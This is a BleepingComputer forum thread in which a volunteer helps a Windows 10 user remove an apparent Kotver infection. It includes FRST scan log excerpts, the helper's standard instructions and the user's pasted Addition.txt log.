2016-10-12 21:35 - 2016-10-05 05:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-10-12 21:35 - 2016-10-05 05:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-10-12 21:35 - 2016-10-05 05:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-10-12 21:35 - 2016-10-05 05:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-10-12 21:35 - 2016-10-05 05:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-10-12 21:35 - 2016-10-05 05:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2016-10-12 21:35 - 2016-10-05 05:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-10-12 21:35 - 2016-10-05 05:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-10-12 21:35 - 2016-10-05 05:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-10-12 21:35 - 2016-10-05 05:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-10-12 21:35 - 2016-10-05 05:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-10-12 21:35 - 2016-10-05 05:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-10-12 21:35 - 2016-10-05 05:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-10-12 21:35 - 2016-10-05 05:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-10-12 21:35 - 2016-10-05 05:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-10-12 21:35 - 2016-10-05 05:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-10-12 21:35 - 2016-10-05 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2016-10-12 21:35 - 2016-10-05 05:12 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-10-12 21:35 - 2016-10-05 05:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-10-12 21:35 - 2016-10-05 05:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-10-12 21:35 - 2016-10-05 05:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-10-12 21:35 - 2016-10-05 05:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-10-12 21:35 - 2016-10-05 05:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-10-12 21:35 - 2016-10-05 05:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-10-12 21:35 - 2016-10-05 05:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-10-12 21:35 - 2016-10-05 05:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-10-12 21:35 - 2016-09-07 01:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-10-12 21:34 - 2016-10-05 06:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-10-12 21:34 - 2016-10-05 06:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2016-10-12 21:34 - 2016-10-05 06:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-10-12 21:34 - 2016-10-05 06:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-10-12 21:34 - 2016-10-05 06:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-10-12 21:34 - 2016-10-05 06:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-10-12 21:34 - 2016-10-05 06:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-10-12 21:34 - 2016-10-05 06:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-10-12 21:34 - 2016-10-05 06:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-10-12 21:34 - 2016-10-05 05:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-10-12 21:34 - 2016-10-05 05:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-10-12 21:34 - 2016-10-05 05:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-10-12 21:34 - 2016-10-05 05:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-10-12 21:34 - 2016-10-05 05:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-10-12 21:34 - 2016-10-05 05:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-10-12 21:34 - 2016-10-05 05:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-10-12 21:34 - 2016-10-05 05:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-10-12 21:34 - 2016-10-05 05:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-10-12 21:34 - 2016-10-05 05:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-10-12 21:34 - 2016-10-05 05:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-10-12 21:34 - 2016-10-05 05:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-12 21:34 - 2016-10-05 05:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-10-12 21:34 - 2016-10-05 05:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2016-10-12 21:34 - 2016-10-05 05:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2016-10-12 21:34 - 2016-10-05 05:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-10-12 21:34 - 2016-10-05 05:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-10-12 21:34 - 2016-10-05 05:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-10-12 21:34 - 2016-10-05 05:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll
2016-10-12 21:34 - 2016-10-05 05:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-10-12 21:34 - 2016-10-05 05:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-10-12 21:34 - 2016-10-05 05:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-10-12 21:34 - 2016-10-05 05:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-10-12 21:34 - 2016-10-05 05:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-10-12 21:34 - 2016-10-05 05:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-10-12 21:34 - 2016-10-05 05:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-10-12 21:34 - 2016-10-05 05:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-10-12 21:34 - 2016-10-05 05:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-10-12 21:34 - 2016-10-05 05:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-10-12 21:34 - 2016-10-05 05:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2016-10-12 21:34 - 2016-10-05 05:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-10-12 21:34 - 2016-10-05 05:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-10-12 21:34 - 2016-10-05 05:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-10-12 21:34 - 2016-10-05 05:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-10-12 21:34 - 2016-10-04 20:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-10-12 20:12 - 2016-10-30 12:51 - 00000000 ____D C:\Users\Harold\AppData\Local\NPE
2016-10-12 19:28 - 2016-10-12 20:03 - 00000000 ____D C:\Users\Harold\Documents\2016 Sept Gaylord
2016-10-08 09:43 - 2016-10-08 09:43 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
2016-10-01 18:11 - 2016-10-08 10:40 - 00000000 ____D C:\Users\Sue\AppData\Local\ConnectedDevicesPlatform
2016-10-01 18:11 - 2016-10-01 18:11 - 00000020 ___SH C:\Users\Sue\ntuser.ini

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-30 17:43 - 2012-09-06 19:52 - 00000000 ___RD C:\Users\Harold\Dropbox
2016-10-30 17:41 - 2016-09-25 18:26 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-10-30 17:41 - 2016-09-25 17:44 - 00000000 ____D C:\ProgramData\NVIDIA
2016-10-30 17:41 - 2015-08-23 11:16 - 00144368 ____N (CyberLink Corp.) C:\WINDOWS\system32\Drivers\rikvm_C6F09094.sys
2016-10-30 17:41 - 2011-03-05 05:13 - 00000000 ____D C:\ProgramData\PDFC
2016-10-30 17:40 - 2016-07-16 02:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-10-30 16:17 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-30 15:47 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-10-30 15:46 - 2011-03-13 19:35 - 00000000 ____D C:\Users\Harold\AppData\Local\CrashDumps
2016-10-30 15:43 - 2016-09-25 17:41 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-10-30 09:46 - 2016-07-16 07:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-30 09:46 - 2015-08-23 11:34 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-10-29 19:30 - 2016-07-16 07:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-29 19:25 - 2016-07-16 02:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-10-29 19:24 - 2016-09-25 17:41 - 00393304 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-10-29 19:24 - 2013-11-25 20:19 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-10-29 19:24 - 2012-02-06 18:48 - 00000336 _____ C:\WINDOWS\Tasks\HPCeeScheduleForHarold.job
2016-10-29 19:23 - 2013-01-11 21:01 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-10-29 19:19 - 2016-07-16 07:47 - 00015425 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2016-10-29 14:50 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-29 14:31 - 2016-09-25 18:26 - 00000000 ____D C:\WINDOWS\System32\Tasks\Remediation
2016-10-29 14:30 - 2016-09-25 18:26 - 00003232 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForHarold
2016-10-29 14:08 - 2009-05-09 21:32 - 00000000 ____D C:\Users\Harold\Documents\Sue
2016-10-29 07:59 - 2012-09-06 19:50 - 00000000 ____D C:\Users\Harold\AppData\Roaming\Dropbox
2016-10-29 07:48 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-10-29 07:48 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-10-24 19:30 - 2016-07-16 07:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-10-24 19:30 - 2016-07-16 07:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-10-23 10:53 - 2016-08-13 07:33 - 00000000 ____D C:\Users\Harold\Documents\2016 UP Vacation
2016-10-23 10:32 - 2016-09-25 18:26 - 00003592 _____ C:\WINDOWS\System32\Tasks\Seagate_Install_Launch
2016-10-23 10:31 - 2015-09-28 13:01 - 00002180 _____ C:\Users\Public\Desktop\Seagate Dashboard.lnk
2016-10-23 10:31 - 2015-09-28 13:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Seagate Dashboard
2016-10-20 12:41 - 2015-09-23 10:20 - 00000000 ____D C:\Users\Sue\AppData\Local\Packages
2016-10-17 20:15 - 2011-03-13 19:32 - 00000000 ____D C:\Users\Harold\Documents\Temp
2016-10-17 17:43 - 2016-09-25 17:48 - 01102996 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-17 17:36 - 2012-05-15 21:36 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-17 17:36 - 2012-05-15 21:36 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-17 17:36 - 2011-06-10 17:09 - 00000344 _____ C:\WINDOWS\Tasks\HPCeeScheduleForFAMILY-HP$.job
2016-10-17 14:55 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-16 21:51 - 2016-09-25 18:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForFAMILY-HP$
2016-10-16 18:47 - 2012-05-15 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-16 18:34 - 2016-07-16 07:47 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-10-16 18:34 - 2015-07-19 09:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2016-10-16 18:34 - 2013-06-07 19:04 - 00000000 ____D C:\WINDOWS\system32\Drivers\N360x64
2016-10-16 18:33 - 2013-06-07 19:05 - 00002316 _____ C:\Users\Public\Desktop\Norton 360.lnk
2016-10-16 18:29 - 2013-08-13 20:37 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-10-16 18:13 - 2011-03-14 22:24 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-10-16 17:33 - 2013-06-07 19:06 - 00100592 _____ (Symantec Corporation) C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS
2016-10-16 17:33 - 2013-06-07 19:06 - 00008319 _____ C:\WINDOWS\system32\Drivers\SYMEVENT64x86.CAT
2016-10-12 20:12 - 2011-03-05 05:16 - 00000000 ____D C:\ProgramData\Norton
2016-10-11 21:15 - 2016-07-16 07:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-10-11 21:15 - 2016-07-16 07:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-10-11 20:56 - 2016-09-25 18:26 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-10-11 20:56 - 2015-11-28 08:43 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-10-11 20:50 - 2016-09-25 18:26 - 00003804 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-10-09 09:04 - 2011-03-13 11:02 - 00000000 ____D C:\Users\Harold\AppData\Roaming\HpUpdate
2016-10-08 09:43 - 2016-09-25 17:49 - 00000000 ____D C:\Users\DefaultAppPool
2016-10-08 07:33 - 2016-09-25 17:49 - 00000000 ____D C:\Users\Sue
2016-10-01 18:44 - 2016-09-25 17:49 - 00000000 ____D C:\Users\Harold
2016-10-01 18:16 - 2015-09-23 10:28 - 00002404 _____ C:\Users\Sue\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-10-01 18:16 - 2015-09-23 10:28 - 00000000 ___RD C:\Users\Sue\OneDrive

==================== Files in the root of some directories =======

2012-02-03 20:25 - 2016-02-02 19:55 - 0001255 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-29 14:31

==================== End of FRST.txt ============================



BC AdBot (Login to Remove)

 


#2 dbrisendine

dbrisendine

  • Malware Response Team
  • 508 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 30 October 2016 - 06:50 PM

Hi brokus4,

Welcome to BleepingComputer. My name is dbrisendine and I'll be helping you with this problem. Before I get into the removal of malware / correction of your problem, I need you to be aware of the following:

  • Please read all of my response through at least once before attempting to follow the procedures described.I would recommend printing them out, if you can, as you can check off each step as you complete it. Also, as some of the cleaning may be done in Safe Mode and there will be no internet connection then, you will find that having the steps printed for reference speeds the cleaning process along. If there's anything you don't understand or isn't totally clear to you, please come back to me for clarification before you start those steps.
  • All of the assistants and staff at BleepingComputer are here on a volunteer basis; please respect our time given to the cause of helping others.If you are going to be away for more than 4 days, please let me know here. (I will do the same for you.) We do realize that 'life happens' and situations arise unexpectedly; we just ask that you keep us up to date.
  • Malware removal is a complex, multiple step process; please stay with me on this thread (don't start another thread) until I declare that your logs are clean and you are good to go. The absence of apparent issues does not mean your system is clean; I will tell you when everything looks good for you to go and help you remove the tools we have used.
  • If any of the security programs on your system should give any warnings about the software tools I ask you to download and use, please do not be alarmed.All of the tools I will have you use are safe to use (as instructed) and malware free.
  • While we strive to disrupt your system as little as possible, things happen.If you can, it would be best to back up your personal files now (if you do not already have a backup). You can store these on a CD/DVD, USB drive or stick, anywhere but on your same system. This will save you from possible anguish later if something unforeseen happens.
  • Please do not run any other tools or scanners than what I ask you to.Some of the openly available software made for malware removal can make changes to your system that interfere with the cleaning of the malware, or even destroy your system. I will use only what the situation calls for and direct you in the proper use of that software.
  • Please do not attach any log files to your replies unless I specifically ask you.Instead please copy and paste so as to include the log in your reply. You can do this in separate posts if it's easier for you.


    - Save ALL Tools to your Desktop-
     

    All the tools that I will have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.

    Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
    Chrome.JPGGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.Settings.JPG Choose Settings. at the bottom of the screen click the
    "Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
    Firefox.JPGMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Settings.JPG Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
    and the click the "Select Folder" button. Click OK to get out of the Options menu.
    IE.jpgInternet Explorer - Click the Tools menu in the upper right-corner of the browser. Tools.JPG Select View downloads. Select the Options link in the lower left of the window. Click Browse and
    select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
    NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
     

Let's get started....
 

The scan by FRST should produced a second log file named Addition.txt .  Please post it as there is vital info in it to remove the Kotver infection completely.


unite_blue_zpsba2e96f7.png
 
Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#3 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:12:50 PM

Posted 30 October 2016 - 07:01 PM

Hello! thank you dbrisendine for volunteering to help me! Below is the contents of the file Addition.txt.

 

BTW, I apologize if my original posting appeared more than once. My browser keep telling me that it failed to send.

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2016
Ran by Harold (30-10-2016 18:34:28)
Running from C:\Users\Harold\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-25 22:31:10)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1355648730-1136835254-2900194302-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1355648730-1136835254-2900194302-503 - Limited - Disabled)
Guest (S-1-5-21-1355648730-1136835254-2900194302-501 - Limited - Disabled)
Harold (S-1-5-21-1355648730-1136835254-2900194302-1001 - Administrator - Enabled) => C:\Users\Harold
HomeGroupUser$ (S-1-5-21-1355648730-1136835254-2900194302-1002 - Limited - Enabled)
Sue (S-1-5-21-1355648730-1136835254-2900194302-1003 - Limited - Enabled) => C:\Users\Sue

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton 360 (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton 360 (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.3.0.3670 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Photoshop Elements 9 (HKLM-x32\...\Adobe Photoshop Elements 9) (Version: 9.0.3.0 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Agatha Christie - Peril at End House (x32 Version: 2.2.0.95 - WildTangent) Hidden
Aimersoft DVD Ripper(Build 3.0.0.2) (HKLM-x32\...\Aimersoft DVD Ripper_is1) (Version:  - Aimersoft Software)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}) (Version: 3.1.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{D7B824DE-DA32-4772-9E5E-39C5158136A7}) (Version: 3.1.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
